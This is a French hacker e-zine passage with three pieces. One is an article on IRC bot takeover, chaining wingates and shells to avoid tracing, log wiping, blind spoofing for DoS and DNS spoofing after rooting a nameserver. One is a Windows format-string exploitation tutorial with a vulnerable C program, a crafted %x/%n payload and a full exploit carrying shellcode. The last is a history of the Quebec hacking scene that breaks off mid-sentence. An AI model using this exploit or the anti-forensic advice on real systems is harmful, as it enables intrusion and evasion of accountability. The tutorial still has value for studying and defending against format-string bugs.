spoofer un op qui est sur un bot et si vous aviez son pass alors..eehhehe vous pourriez avoir le controle du bot pour faire une takeover hahahahahaha...ok redevenons serieux.. faire ca c'est lame... mais bon..heheheh ceux qui veulent le faire faite le.:). 2- WiNGATE ,PROXY,SHELL Bon.. ici on ne peux parler de grosses techniques..mais plutot de sysadmin pas vailliant qui nous aident.Ici je parle des wingates qui nous permettent de spoofer l'adresse du wingate connecte,des proxy et des shells qui font la meme chose. En fait on rencontre souvent des gens qui vont sur irc, qui wingatent..ou qui run un shell UNiX pour pouvoir nuker... c'est tres bien mais moi l'application des wingates, proxy et des shells que je trouve la plus pratique c'est que nous pouvons pratiquement spoofer notre presence quand nous hackons un serveur.Je veux dire que par la combinaison suivante qui m'a ete donner par un Conseillier senior d'un service internet quelconques nous pouvons etre intracable..: Notre ordi==>wingate==>wingate==>Shell==>wingate==>CiBLE Bon il faut s'entendre intracable par traceroute et..quelques autres commandes..bien sur si vous hackez un serveur du pentagone..:) heheh ils ont des chances de vous retrouver..environ 50% car..les wingates sont en fait des bugs...mais certains administrteur ne se souciant pas de la perte de bandwith de leur reseau les laissent ouverts... mais log les connections :) alors...si on vous log..et si par chance pour l'intelligence qui vous pourchasse tout les wingates etaient logges...alors bonne chance :). Bon..il faut aussi mentionner que si vous hackez par l'intermediaire d'un shell il est bon de savoir comment effacer les logs...bien sur il y a plein d'exploits pour ca ....utmpclean,zap,marry..... voir:www.rootshell.com. En fait la solution est de bien couvrir ses traces..:) Ha une autre chose a propos des wingates...certains wingates son ouverts seulement pour vous attirer vers eux puis ensuite logger toutes vos actions alors attention... Pour trouver les wingates..utilisez un wingate scanner... Proxy = meme chose Shells = achetez en un...ou Hackez en un :) 3- Le BLiND SPOOFiNG... Bon...je ne m'etendrai pas vraiment la dessus...le blind spoofing est surtout utilise pour les DoS ...Nukes.. il permet de spoofer l'adresse d'un packet.L'inconvenient c'est que le packet reste tracable sur le reseau de routers utiliser pour lancer l'attaque. Alors le packet est tracable.. et vu que les routers sont logges.. alors :) hehehe on peut vous retracer si le besoin s'en fait ressentir en fait le blind spoofing repose sur le principe que le packet se dirige dans une seule direction Alors on ne peut voir le resultat....du point de vue du packet envoye...exemple: J'envoie un packet spoofe a 170.90.90.90 provenant de l'adresse 120.3.2.1 ...je n'ai plus de controle sur 120.3.2.1 . N'oublier pas que ma vrai adresse n'est pas 120.3.2.1 mais que si on trace 120.3.2.1 et notre adresse on retrouvera qu'il proviennent des meme routers que notre ip et si on regarde dans les logs des routers...on retrouvera le ip de provenance..(j'ai deja ete retrace pour avoir fait crasher des machines qui runnaient linux avec nestea...hehehe mais bon maintenant ce bug fix.) Le blind spoofing est donc souvent utilise dans les nukes...car nous n'avons pas besoin de recevoir un packet..pour confirmer qqch. Encore une fois ces attaques peuvent etre loguees ou tracees mais un packet provenant d'un blind spoof a une duree de vie egale a celle des logs que les routers gardent... alors si vous voulez savoir combien de temps votre securitee peux etre compromise... hum appelez votre ISP et demandez lui combien de temps les routers gardent les logs ;) je ne sais pas pourkoi mais ils ont refuse de me le dire hehehehe. 4- Le BiND SPOOFiNG Hum..bon...voici le summum de la protection....que nous pouvons avoir en fait si on est capable de reunir toutes les composantes nesessaires. Premierement savoir : Qu'est-ce qu'un Domain-name-server,Name server ou NS: J'utilise la compagnie internet total.net Pour me donner un nom en fait une addresse ip le serveur a recours a un Name server qui m'a attribue une addresse ip ..vous avez deviner un Name server c'est ce qui donne les ip..et la resolution en nom comme www.yaho.com = 204.71.200.74 toutes ses conversions en lettres sont effectuees par eux... alors imaginez le reste si vous pouviez avoir l'acces root sur un NS :)! Exactement..vous dever avoir.. root sur un NS pour vraiment spoofer pouvoir changer votre dns....alors.les mythes entourant le spoof sont grandement resolus.. Et apres le root....comment fait t'on...:) utilisez un programme comme jizz ou any-erec des BiND spoofers Bien sur je recommande de faire cela avant de se rooter sur un NS Notre ordi==>wingate==>shell==>wingate==>NS dumoins si vous voulez ne pas etre logge Et comment trouver les Nameservers...? Bien en Windows 95 ..je ne sais pas mais en Linux ou Unix....la commande Nslookup est tres utile..! EX: Nslookup -type=any www.yahoo.com non-authorative nameserver...on oublie ca....! authorarive nameserver ns.yahoo.com = 204.71.177.33 ect.... alors ce sont les nameservers :) mais attention les nameserveurs sont souvent les colones vertebrales des reseaux alors attention de ne pas les mettre down!... Bon je crois que cela fait un survol du spoofing... alors pour terminer j'aimerais vous dire que ce n'etait qu'un bref survol..si la demande est forte et que Err418 veut que je produise encore alors je produirai un autre article. Pour me joindre : Undernet: BiNF_ #Rhino9,#HACk.fr ou binf_80@hotmail.com Merci special a FBoy pour la correction des fautes :) Apres je me demande pourkoi j'ai 40% en francais.. Pour plus d'information sur le HACKiNG en general : www.rhino9.com :Sekurity team www.frhack.org : FRhack www.yahoo.com : ;) ... _,' `'--/ .' `' \-./,,, _./` | ``'., ,-` / /' '\ | `', _-` / | `', ,- , @| @| | ', / / \ `. ,` ,' . , ,.,, . / ; ` | ``'., \ ' | | ., .. ' ' -\ /%\ |' ``-, . ' ' ,` . \%/ .` `'' ' , -- ., / / ,' ,-` \ | '.,. '-. | ,' , . ` ,' | \ `./ ,- ` .` . \ , \ `\,/ .` ,, \ / '` | -''' ` ,' ,' \ | , | / ,-` ,' `'--'`` ,- ` ` `` , ,' -_, \... / .` _-` `\ _ \ `,,,, _,._ .` ,- ` ``. \ ` , .';` \ ,' ,- ' ,---'-.,, `. `' \ ,' | \,,-` ,- , . | . ' | \ | ,' ,' `-` | `', | \ | | .` ,` | | ` ` | | - ,' / | '' ,` / / | .. / | \ .` `', , . . .` / `''-- - , , -` ,` ,' . . '-`` ,'` . \ `'-,, _,-'` / ', ``''---''`` - \ ,' `. .` `', _-` `-, _-' `'.,, _,.'` ``'''---'''`` Des problemes d'articles fantomes dans votre e-zine ? Who you gonna call ? ZINEBUSTER | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Ivanlef0u ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[1O]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | Format `'-.,_ `''.,. `| `-, '.------- '\,_ `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ String `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ Win ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : AAAAAAAAAAAAAAAAAAAAAAAAA Again! ]=- Exploitation des bugs de format under windows --------------------------------------------- 1:Intro ------- Qu'est-ce qu'un bug de format? Un bug de format survient lorsque l'on essai d'afficher une valeur sans en preciser le type. Le plus frequemment cela intervient avec la fonction printf. Il faut savoir qu'il y a plusieurs facon d'afficher un texte avec la fonction printf, soit l'on precise le type et la tout ce passe bien, par ex: int moi=4; printf("%d\n",moi); Cela nous affichera bien le chiffe 4. Mais on peut aussi etre plus fenéant et laisser la fonction ce debrouiller elle meme comme la: char moi[]="moi"; printf(moi); On aura donc en sortie "moi", en fait si l'on ne précise pas le type printf considère que c'est une string que l'on veut afficher. Il existe differents type de ce que l'on peut afficher: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vclib/html/_crt_printf_type_field_characters.asp Character Type Output format c int or wint_t When used with printf functions, specifies a single-byte character; when used with wprintf functions, specifies a wide character. C int or wint_t When used with printf functions, specifies a wide character; when used with wprintf functions, specifies a single-byte character. d int Signed decimal integer. i int Signed decimal integer. o int Unsigned octal integer. u int Unsigned decimal integer. x int Unsigned hexadecimal integer, using "abcdef." X int Unsigned hexadecimal integer, using "ABCDEF." e double Signed value having the form [ – ]d.dddd e [sign]ddd where d is a single decimal digit, dddd is one or more decimal digits, ddd is exactly three decimal digits, and sign is + or –. E double Identical to the e format except that E rather than e introduces the exponent. f double Signed value having the form [ – ]dddd.dddd, where dddd is one or more decimal digits. The number of digits before the decimal point depends on the magnitude of the number, and the number of digits after the decimal point depends on the requested precision. g double Signed value printed in f or e format, whichever is more compact for the given value and precision. The e format is used only when the exponent of the value is less than –4 or greater than or equal to the precision argument. Trailing zeros are truncated, and the decimal point appears only if one or more digits follow it. G double Identical to the g format, except that E, rather than e, introduces the exponent (where appropriate). n Pointer to integer Number of characters successfully written so far to the stream or buffer; this value is stored in the integer whose address is given as the argument. p Pointer to void Prints the address of the argument in hexadecimal digits. s String When used with printf functions, specifies a single-byte–character string; when used with wprintf functions, specifies a wide-character string. Characters are printed up to the first null character or until the precision value is reached. S String When used with printf functions, specifies a wide-character string; when used with wprintf functions, specifies a single-byte–character string. Characters are printed up to the first null character or until the precision value is reached. Note If the argument corresponding to %s or %S is a null pointer, "(null)" will be printed. En fait nous allons voir que si le programmeur ne controle pas ce que affiche printf il y moyen d'exploiter cela. Sous linux cette technique etant connu depuis longtemps mais sous win je n'ai trouvé que tres peu de choses y faisait allusion c'est pourquoi j'ai pensé qu'il était interessant d'en parler. 2: Format bugs ,where are you ?? -------------------------------- Je previens dès le depart que les valeurs que je trouve ne serons pas forcément les memes que vous. J'utilise Borland C++ 5.5 pour compiler mes progs et je suis sous Microsoft Windows 2000 [Version 5.00.2195] avec les dernières mises a jours (celles de 10/2005). Voici un code vulnerable: ------------Cut Here----------------- #include #include int main(int argc, char *argv[]) { char buffer[512]=""; if (argc != 2) return -1; strncpy(buffer,argv[1],500);//le bof est impossible a cause du strncpy printf(buffer); //la vuln se situe ici return 0; } ------------Cut Here----------------- Alors si on essaye de mettre en argv: %x que se passe t'il ? voici ce qui ressort: 0 wtf ?? d'ou qu'il sort lui. Explications lorsque l'on donne %x en argument a printf , celle ci va afficher ce qui se trouve sur le haut de la stack voici l'état de la stack lors de l'appel a printf (break sur le printf avec ollydbg): esp=0012FD80 0012FD80 0012FD8C \Arg1 = 0012FD8C ASCII "%x" 0012FD84 00000000 0012FD88 0040A0B8 vuln.0040A0B8 0012FD8C 00007825 :correspont a %x 0012FD90 00000000 Notre texte en copié dans la stack a partir de l'adresse 0012FD8C. vuln est le nom de mon .exe vulnerable. On peut voir l'argument a l'adresse 12FD80 et juste en dessous le fameux 0 voila d'ou il vient.si l'on met %x%x en argv l'on a en sortie: 040a0b8 ce qui correspond bien a la stack. De plus si l'on met en argv: aaaa%x%x%x l'on a: aaaa040a0b861616161 les 4 'a' sont affichés suivis des valeurs "pointés" par les 3 %x que l'on a entré et des 61616161 qui sont nos 'a' mit dans le buffer la stack. J'utiliserais le mot "pointé" car il ne s'agit pas reellement d'un pointeur mais c'est le terme le plus approprier que j'ai trouvé Il s'agit plutot des arguments que l'on devrait donner aux differents %x. a ce moment la stack est comme ceci: 0012FD80 0012FD8C \Arg1 = 0012FD8C ASCII "aaaa%x%x%x" 0012FD84 00000000 0012FD88 0040A0B8 vuln.0040A0B8 0012FD8C 61616161 0012FD90 78257825 0012FD94 00007825 0012FD98 00000000 c'est en 12FD8C qu'est situé le buffer. (je répète pour ceux qui s'endorment) 3 How to exploit this ? ---------------------- L'opérateur le plus intéressant (pour nous :)) est certainement %n, celui ci ecrit a l'empacement memoire "pointer par le printf" le nombre d'elements affichés avec lui :p par l'exemple c'est plus simple. Si l'on entre: aaaa%x%x%n les 2 %x font que le %n va tenter d'ecrire a l'adresse 61616161 la valeur: 4+7=11 le 4 c'est les 4 'a' que l'on a entré et le 7 c'est la stack 0012FD84 00000000 //1 caratere ici 0 0012FD88 0040A0B8 //6 carateres 0012FD8C 61616161 //l'addr de notre %n Alors si on cogite bien fort. Imaginons que nous tendions d'incrire a l'adresse de retour de notre fonction main l'adresse de notre buffer contenant un shellcode, on aura réussi a detourner notre prog. 0012FF90 00407D1A RETURN to vuln.00407D1A //c'est ici que se situe le RET //du main Il faut donc qu'on écrive a l'adresse 0012FF90 la valeur 0012FD8C Le plus chaud c'est de calculer parfaitement parce que il faut foutre un shellcode de n octets que le printf "pointe" sur l'adrr a laquelle on veut ecrire et que la nbr de caractères soit egal a l'adresse de notre buffer ......(mal a la tete la ?? prenez une aspirine ..!) Pour simplifier vla l'erreur qu'on retrouve avec ollydbg: 004043BD |. 890A |MOV DWORD PTR DS:[EDX],ECX EDX=61616161 ECX=0000000B //11 le nbr de caract affiches Alors voila a quoi doit ressembler notre truc: [shellcode][%x..%x][%nx][%n][addr du ret ds la stack] pour respecter le nbr de carratères affiches on va utiliser une technique de chinois c'est a dire que l'on va faire %nx ou le n correspond a la precision de l'affichage, c'est comme si on simulait des lettres quoi. Si on fait %20x on va avoir dans notre ECX la valeur 0x14. Mon shellcode fait 54 octets (hardcode) il faut donc combler avec 2 'A' pour obtenir un multiple de 4 apres faut bien calculer. alors l'on a 56/4=14 %x a foutre pour depasser le shellcode plus les 2 qui sont avant le buffer sa fait 16 AAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n les 'a' représentent le shellcode et les 'A' sont du padding. 0012FD80 0012FD8C Œý. \Arg1 = 0012FD8C ASCII "AAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n" 0012FD84 00000000 .... 0012FD88 0040A0B8 ¸ @. vuln.0040A0B8 0012FD8C 61614141 AAaa 0012FD90 61616161 aaaa 0012FD94 61616161 aaaa 0012FD98 61616161 aaaa 0012FD9C 61616161 aaaa 0012FDA0 61616161 aaaa 0012FDA4 61616161 aaaa 0012FDA8 61616161 aaaa 0012FDAC 61616161 aaaa 0012FDB0 61616161 aaaa 0012FDB4 61616161 aaaa 0012FDB8 61616161 aaaa 0012FDBC 61616161 aaaa 0012FDC0 61616161 aaaa 0012FDC4 78257825 %x%x * 0012FDC8 78257825 %x%x 0012FDCC 78257825 %x%x 0012FDD0 78257825 %x%x 0012FDD4 78257825 %x%x 0012FDD8 78257825 %x%x 0012FDDC 78257825 %x%x 0012FDE0 78257825 %x%x 0012FDE4 00006E25 %n.. 0012FDE8 00000000 .... ** Le gros probleme c'est que il faut trouvé la juste mesure entre le nbr de '%x' et l'adresse qu'il font "pointer" a printf je m'explique ici avec nos 16 '%x' ,EDX vaut 78257825 (voir *) alors que nous ce que l'on veut c'est tomber au ** pour mettre notre adr du ret .... Vi je sais c'est prise de tete mais j'essaye d'expliquer du mieux que je peut. Alors en procedant par tatonnement (ya pas de honte nan mais!) on arrive a: BBAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%nbbb J'ai rajouté 2 'B' avec de faire du padding afin de parfaitement aligner les bytes dans la stack. 0012FD80 0012FD8C \Arg1 = 0012FD8C ASCII "BBAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%nbbb" 0012FD84 00000000 0012FD88 0040A0B8 vuln.0040A0B8 0012FD8C 41414242 0012FD90 61616161 0012FD94 61616161 0012FD98 61616161 0012FD9C 61616161 0012FDA0 61616161 0012FDA4 61616161 0012FDA8 61616161 0012FDAC 61616161 0012FDB0 61616161 0012FDB4 61616161 0012FDB8 61616161 0012FDBC 61616161 0012FDC0 61616161 0012FDC4 78256161 0012FDC8 78257825 0012FDCC 78257825 0012FDD0 78257825 0012FDD4 78257825 0012FDD8 78257825 0012FDDC 78257825 0012FDE0 78257825 0012FDE4 78257825 0012FDE8 78257825 0012FDEC 78257825 0012FDF0 78257825 0012FDF4 78257825 0012FDF8 78257825 0012FDFC 78257825 0012FE00 78257825 0012FE04 78257825 0012FE08 6E257825 0012FE0C 00626262 voila avec ca notre EDX vaudra 62626262, donc on peut dire a quelle adrresse doit ecrire le prog. Ban c'est pas fini il faut maintenant que le ecx vale l'adresse de notre buffer qui est 0012FF90 alors pour ca on va devoir encore modifier tout le truc. On va utilisé ce que j'ai dit plus haut, c'est a dire qu'avec un %n on va faire augmenté la valeur de ECX jusqu'a quelle vale l'addr de notre buffer (ici 12FD8C). Alors en bidouillant encore et toujours...on obtient: BAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%1244220x%nbbb on a 37 %x 0x0012FD8C=1244556 on entre 56 carratères. il ya 37 %x dont 2 servent pour les 7 premiers carratères et les autres affichent 8 carratères sauf le dernier qui en affiche n (le nbre que l'on veut déterminer). ce qui fait 8*34+7 caracteres affichés par les %x. n=124556-57-7-8*34=1244220. 0012FD80 0012FD8C Œý. \Arg1 = 0012FD8C ASCII "BAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%1244220x%nbbb" 0012FD84 00000000 .... ---- 0012FD88 0040A0B8 ¸ @. vuln.0040A0B8 0012FD8C 61414142 BAAa 0012FD90 61616161 aaaa 0012FD94 61616161 aaaa 0012FD98 61616161 aaaa 0012FD9C 61616161 aaaa 0012FDA0 61616161 aaaa 0012FDA4 61616161 aaaa 0012FDA8 61616161 aaaa 0012FDAC 61616161 aaaa 0012FDB0 61616161 aaaa 0012FDB4 61616161 aaaa 0012FDB8 61616161 aaaa 0012FDBC 61616161 aaaa 0012FDC0 61616161 aaaa 0012FDC4 25782561 a%x% 0012FDC8 25782578 x%x% 0012FDCC 25782578 x%x% 0012FDD0 25782578 x%x% 0012FDD4 25782578 x%x% 0012FDD8 25782578 x%x% 0012FDDC 25782578 x%x% 0012FDE0 25782578 x%x% 0012FDE4 25782578 x%x% 0012FDE8 25782578 x%x% 0012FDEC 25782578 x%x% 0012FDF0 25782578 x%x% 0012FDF4 25782578 x%x% 0012FDF8 25782578 x%x% 0012FDFC 25782578 x%x% 0012FE00 25782578 x%x% 0012FE04 25782578 x%x% 0012FE08 25782578 x%x% 0012FE0C 32312578 x%12 0012FE10 32323434 4422 0012FE14 6E257830 0x%n --- 0012FE18 00626262 bbb. Voila le sploit qui réalise tout ca: ------------Cut Here----------------- #include #include #include int main() { char shellcode[]="\x8B\xEC\x53\x57\x8B\xEC\x83\xEC\x0C\xC7\x45\xF4" "\x4d\x69\x6E\x64" //Mind "\xC7\x45\xF8" "\x6B\x69\x6E\x64" //kind "\xC7\x45\xFC" "\x21\x72\x6F\x78" //!rox "\x33\xDB" "\x8D\x45\xF4\x53\x50\x50\x53\xBB" "\x81\x3D\xE0\x77" //Addr de MessageBox dans USER32.dll "\xFF\xD3\x57\xBB\xBE\x69" "\xE9\x77\xFF\xD3"; //Addr de ExitProcess ds KERNEL32.dll char buffer[500]="vuln "; char buff1[]="AAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"; strcat(buffer,shellcode); strcat(buffer,buff1); strcat(buffer,"%1244220x%n\x90\xFF\x12"); system(buffer); return 0; } ------------Cut Here----------------- Voici l'état de la stack avec le sploit: 0012FD80 0012FD8C \Arg1 = 0012FD8C 0012FD84 00000000 0012FD88 0040A0B8 vuln.0040A0B8 0012FD8C 5753EC8B 0012FD90 EC83EC8B 0012FD94 F445C70C 0012FD98 646E694D 0012FD9C 6BF845C7 0012FDA0 C7646E69 0012FDA4 7221FC45 0012FDA8 DB33786F 0012FDAC 53F4458D 0012FDB0 BB535050 0012FDB4 77E03D81 USER32.MessageBoxA 0012FDB8 BB57D3FF 0012FDBC 77E969BE KERNEL32.ExitProcess 0012FDC0 4141D3FF 0012FDC4 25782541 0012FDC8 25782578 0012FDCC 25782578 0012FDD0 25782578 0012FDD4 25782578 0012FDD8 25782578 0012FDDC 25782578 0012FDE0 25782578 0012FDE4 25782578 0012FDE8 25782578 0012FDEC 25782578 0012FDF0 25782578 0012FDF4 25782578 0012FDF8 25782578 0012FDFC 25782578 0012FE00 25782578 0012FE04 25782578 0012FE08 25782578 0012FE0C 32312578 0012FE10 32323434 0012FE14 6E257830 0012FE18 0012FF90 Le shellcode correspont a: 0012FD8C 8BEC MOV EBP,ESP 0012FD8E 53 PUSH EBX 0012FD8F 57 PUSH EDI 0012FD90 8BEC MOV EBP,ESP 0012FD92 83EC 0C SUB ESP,0C 0012FD95 C745 F4 4D696E64 MOV DWORD PTR SS:[EBP-C],646E694D 0012FD9C C745 F8 6B696E64 MOV DWORD PTR SS:[EBP-8],646E696B 0012FDA3 C745 FC 21726F78 MOV DWORD PTR SS:[EBP-4],786F7221 0012FDAA 33DB XOR EBX,EBX 0012FDAC 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 0012FDAF 53 PUSH EBX 0012FDB0 50 PUSH EAX 0012FDB1 50 PUSH EAX 0012FDB2 53 PUSH EBX 0012FDB3 BB 813DE077 MOV EBX,USER32.MessageBoxA 0012FDB8 FFD3 CALL EBX 0012FDBA 57 PUSH EDI 0012FDBB BB BE69E977 MOV EBX,KERNEL32.ExitProcess 0012FDC0 FFD3 CALL EBX Voila voila alors oui je sais exploiter un format string sous windows c'est pas simple mais on peut voir que rien n'est inexploitable ;). Pour éviter ce genre de bug le plus est de tjrs controlé ce qui est affiché par printf() et d'autre fonction du meme genre evidemment :) J'espère que cet article vous a plu, meme si parfois je me perd dans mes explications je pense que vous avez compris une bonne partie Reference --------- Windows 2000 Format String Vulnerabilities http://www.nextgenss.com/papers/win32format.doc Contact ------- mail: ivanlef0u119@yahoo.fr website: http://membres.lycos.fr/moi118118/ | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Wyzeman ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[11]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ L'histoire `''.,, ``'.,,-/``--., `.,`'., | ', | de `'-.,_ `''.,. `| `-, '.------- '\,_ la `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ scène `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ du Quebec ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : Once upon a time... ]=- L'histoire de la scène québecoise remonte au début des annees 90 avec le groupe NPC (Northen phun co). Certe il devait exister une scène avant cette date, mais il n'en reste plus de document concret pouvant le prouver. Il n'est donc pas faux de dire que NPC est le premier groupe de l'histoire de la scène. En 92 les bbs étais roi des communications réseautiques informatisées. Quand on avait un 14,4 on était le king et fouiller une poubelle étais un acte respectable. Domage que le recyclage n'étais pas aussi à la mode que aujourd'hui, bref en se temps obscure, les informations venait avec un vieu cafe et une pelure de banane. Malgrés ses inconvéniants peu geek compilant, NPC reussi un tour de force en se propageant à la grandeur des bbs québecois, francais et parfois même americain. Certain membre de NPC furent des premiers Quebecois a publier dans le renomer ezine phrack. Ils publierent eux même 15 ezines, dont en particulier les exelents text d'opinion de merlin l'emmerdeur et des articles techniques de bon niveau pour lépoque. La mode en 92-94 etais de se trouver un accompte internet quelque par (incomparable et difficilement imaginable pour qui na pas vécu cette epoque). 1 membres de npc se fu arreter apres avoir bruteforcer 46000 attemps sur un pbx de l'universitée laval pour acceder au réseau des réseaux. Le groupe est surtout célèbre pour avoir passer live a TVA et pour avoir diffusé la totaliter des # des employers de bell canada sous pretexte déviter les embouteillages telephoniques et pouvoir vous addresser directement à la personne qui occupe les fonctions dont vous avez besoin. Ils mirent fin à leur activité underground pour débuter le premier isp publique à Québec, ce isp existe toujours dailleur. Blitzkrieg et sont équipe auront donc publier un total de 15 ezines pour une grosseur moyenne inégaler jusqua aujourd'hui pour un ezine Québecois. Le deuxième groupe Québecois à laisser un echo dans l'histoire fût le groupe Corrupte-Addict, de nature beaucoup plus black hat que NPC, C-A à laissé sa trace pour ses centaines de hack (à un époque où internet était la quasi exclusivité des elites informatiques universitaires), et beaucoup de phreaking actif. il se sont dailleur faite buster en parti à cause d'un phreak allé trop loin, le reste du groupe est tombé sous des accusations chanceuses, après avoir faite une saisi pour un mauvais prétexte. leur leader phaust et quelques autres membres du groupe ressurent des sanctions judiciares mineures, ce qui mi fin à leur activité et accelleras la disparition des documents que C-A avait publiés entre 94 et 96. Après cette époque, plus jamais aucun groupe n'occupa l'entière totalité de la scène, elle fût dabord partager en 2 entre TC (Total Control) et FrHack à une époque où l'age d'or des bbs etais du passer et le modem cable commencais à faire parti des discutions. La plus part des gens accédait à internet sur un 56k et prennais 3 minutes a downloader un mp3. les movie etais a chier, et un windows 95 se fesais nuker tout les 10 secondes. Total-control fût majoritairement l'histoire d'un seul personange, err418 sherbrookois de naissance, il se fit remarquer pour avoir arraché quelques millenium et forterresse, ainsi que pour avoir releaser 17 ezine de 40k. En contre parti venais le groupe de Snowcrash unis sous la bannière de FrHack, qui bien que supérieur en qualité a Total controle ne publia que 5 numero, épuisé dans une course au ezine que IGA lui aura imposer en fin de carrière. TC abandona la course pour les mêmes raisons. une nouvelle ère débutais. Tandit que Err418 disparaissais du décors, Frhack reconditionnais sont groupe en cie de securité quelquonque, qui est encore en affaire aujourd'hui. La légende raconte qu'ils auraientt quité l'underground face à des menaces de la GRC. Lépoque suivante fût débatue majoritairement par 2 groupes mais à la différence de lépoque anterieur, beaucoup d'autre groupe tentère de publier un ezine pour concurencer les 2 grand. Ce fut __2 et sont groupe IGA qui par perceverance, stratégie et coup bas parvins à evincer tout ces adversaires et a sortir grand gagnant au palmares des ezine, parvenant à se ranger tout juste derrière NPC au niveau du nombre et de la grosseur moyennes des documents. Pyrofreak fi bonne figure avec 11 ezines publié à lépoque ou Neuro, endrix, tekrebel et kevorkian étais au controle du groupe, patof qui en pris la succession conserva le groupe vivant mais relativement peu actif. bien que le groupe existe encore aujourdhui, il na rien publier depuis 1999. UHA et TSA firent la connaissance de la fusion avec IGA, tandis que nevr-c et 912hd furent écraser du pied gauche par IGA après s'être déclarer infidèle au reigne de IGA. QHA arrivé sur le tard réussit à se faire connaitre localement auprès de la nouvelle génération qui ne trouvais plus echo en un IGA ou un Pyrofreak. Underway s'essaya sur le tard, et meme si encouragé au début par IGA, le groupe ne survit pas au black out de la scéne qui devait suivre immediatement après la fin de IGA décider sur un coup de tête. Ensuite vint une époque étrange, mélange d'age noir et de golden age. un époque ou l'exelence chevauche la désolation, la scène se retrouva s'eparé en 2 groupes qui n'avaient aucune préoccupation de publier ou d'apparaitre publiquement tout court. Les 2 groupes qui existère à cette époque furent sector_x et ronin, puisque aucun des 2 groupes ne publierent ou ne laisserent de traces tangibles, il y a peu a dire sur cette époque. la majorité des membres de ronin venaient de l'ex elite de pyrofreak, et sector_x rassemblais les restants de iga et de frhack. Cette situation duras plus ou moin 1 annee et sector_x se separa en 2 g roupes au vision differentes, une pour former mindkind avec les restants d'un ronin désormais histoire du passé, et l'autre pour rejoindre devhell, un groupe francais international. Une 3eme branche insatisfaite se sépara pour créer NN, un groupe discret qui ne laissa pas de trace apparante d'activiter. les années 2000 à 2005 virent s'éteindre dans l'oublie QHA et d'autre groupe insignifiant tel que madquebec. La nouvelle scène abandonné en 99 se ralia autour d'un groupe nouveau genre, baser sur lactivité script kiddies, durant prêt de 3 ans le rectum crew sema le flood et la grosse terreur méchante autour deux, suivt par leurs descendant modeste et pratiquement mort dans loeuf, que sont le crosseur crew et aka crew. Parrallellement se devellopait un megaoctet sans goût, un 